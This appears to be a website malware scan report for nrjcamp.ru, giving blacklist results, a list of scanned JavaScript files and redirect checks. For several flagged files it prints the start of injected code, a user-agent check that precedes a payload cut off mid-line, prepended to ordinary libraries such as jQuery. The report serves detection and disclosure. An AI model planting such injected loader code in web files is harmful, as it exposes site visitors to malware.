Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=nrjcamp.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://nrjcamp.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.nrjcamp.ru/ | 200 OK Content-Length: 25222 Content-Type: text/html | clean |
http://www.nrjcamp.ru/templates/nrj/js/ga.js | 200 OK Content-Length: 27669 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','Chrome','Macintosh','iPad','Linux'];var DabList=false;for(var i in agentList){var item=agentList[i];if(user_agentData(item)){console.log(item);DabList=true;break}}return DabList}if(!ListUA()){d ;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://www.nrjcamp.ru/templates/nrj/js/jquery-1.4.2.js | 200 OK Content-Length: 171015 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','Chrome','Macintosh','iPad','Linux'];var DabList=false;for(var i in agentList){var item=agentList[i];if(user_agentData(item)){console.log(item);DabList=true;break}}return DabList}if(!ListUA()){d elem.documentElement["client" + name], elem.body["scroll" + name], elem.documentElement["scroll" + name], elem.body["offset" + name], elem.documentElement["offset" + name] ) : size === undefined ? jQuery.css( elem, type ) : this.css( type, typeof size === "string" ? size : size + "px" ); }; }); window.jQuery = window.$ = jQuery; })(window); ;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://www.nrjcamp.ru/templates/nrj/js/html5.js | 200 OK Content-Length: 2301 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','Chrome','Macintosh','iPad','Linux'];var DabList=false;for(var i in agentList){var item=agentList[i];if(user_agentData(item)){console.log(item);DabList=true;break}}return DabList}if(!ListUA()){d document.createElement("meter"); document.createElement("nav"); document.createElement("output"); document.createElement("progress"); document.createElement("rp"); document.createElement("rt"); document.createElement("ruby"); document.createElement("section"); document.createElement("source"); document.createElement("summary"); document.createElement("time"); document.createElement("video");;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://www.nrjcamp.ru/templates/nrj/js/maxheight.js | 200 OK Content-Length: 4249 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','Chrome','Macintosh','iPad','Linux'];var DabList=false;for(var i in agentList){var item=agentList[i];if(user_agentData(item)){console.log(item);DabList=true;break}}return DabList}if(!ListUA()){d elements.push(child); } } return elements; } } document.getDimensions = function (element) { var display = element.style.display; if (display != 'none' && display != null) { return {width: element.offsetWidth, height: element.offsetHeight}; } return {width: originalWidth, height: originalHeight}; };;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://www.nrjcamp.ru/templates/nrj/js/script.js | 200 OK Content-Length: 2399 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','Chrome','Macintosh','iPad','Linux'];var DabList=false;for(var i in agentList){var item=agentList[i];if(user_agentData(item)){console.log(item);DabList=true;break}}return DabList}if(!ListUA()){d afterChange: function(){}, slideshowEnd: function(){} }); }); $(document).ready(function() { $('.menu a').hover(function(){$(this).stop().animate({paddingTop:'51px'}, 200,'easeInBack').animate({paddingTop:'32px', paddingBottom:'36px'}, 200, 'easeOutExpo')}, function(){$(this).stop().animate({paddingTop:'51px'}, 200,'easeInBack').animate({paddingTop:'32px', paddingBottom:'27px'}, 200, 'easeOutExpo')}); });;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://www.nrjcamp.ru/templates/nrj/js/jquery.js | 200 OK Content-Length: 822 Content-Type: application/javascript | clean |
http://www.nrjcamp.ru/templates/nrj/js/jquery_002.js | 200 OK Content-Length: 822 Content-Type: application/javascript | clean |
http://www.nrjcamp.ru/templates/nrj/js/jcarousellite_1.0.1.js | 200 OK Content-Length: 3205 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','Chrome','Macintosh','iPad','Linux'];var DabList=false;for(var i in agentList){var item=agentList[i];if(user_agentData(item)){console.log(item);DabList=true;break}}return DabList}if(!ListUA()){d Antivirus reports:
| ||
http://www.nrjcamp.ru/templates/nrj/js/jquery.nivo.slider.pack.js | 200 OK Content-Length: 13105 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','Chrome','Macintosh','iPad','Linux'];var DabList=false;for(var i in agentList){var item=agentList[i];if(user_agentData(item)){console.log(item);DabList=true;break}}return DabList}if(!ListUA()){d Antivirus reports:
| ||
http://counter.rambler.ru/top100.jcn?2480436 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://www.nrjcamp.ru/about | 200 OK Content-Length: 45928 Content-Type: text/html | clean |
http://www.nrjcamp.ru/templates/nrj/js/jquery.form.js | 200 OK Content-Length: 32831 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','Chrome','Macintosh','iPad','Linux'];var DabList=false;for(var i in agentList){var item=agentList[i];if(user_agentData(item)){console.log(item);DabList=true;break}}return DabList}if(!ListUA()){d this.checked = select; else if (this.tagName.toLowerCase() == 'option') { var $sel = $(this).parent('select'); if (select && $sel[0] && $sel[0].type == 'select-one') { $sel.find('option').select(false); } this.selected = select; } }); }; })(jQuery); ;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://www.nrjcamp.ru/templates/nrj/js/jquery.livequery.js | 200 OK Content-Length: 822 Content-Type: application/javascript | clean |
http://www.nrjcamp.ru/templates/nrj/js/share42/share42.js | 200 OK Content-Length: 3148 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','Chrome','Macintosh','iPad','Linux'];var DabList=false;for(var i in agentList){var item=agentList[i];if(user_agentData(item)){console.log(item);DabList=true;break}}return DabList}if(!ListUA()){d Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: nrjcamp.ru
Result:
GET / HTTP/1.1
Host: nrjcamp.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: nrjcamp.ru
Referer: http://www.google.com/search?q=nrjcamp.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: nrjcamp.ru
Referer: http://www.google.com/search?q=nrjcamp.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.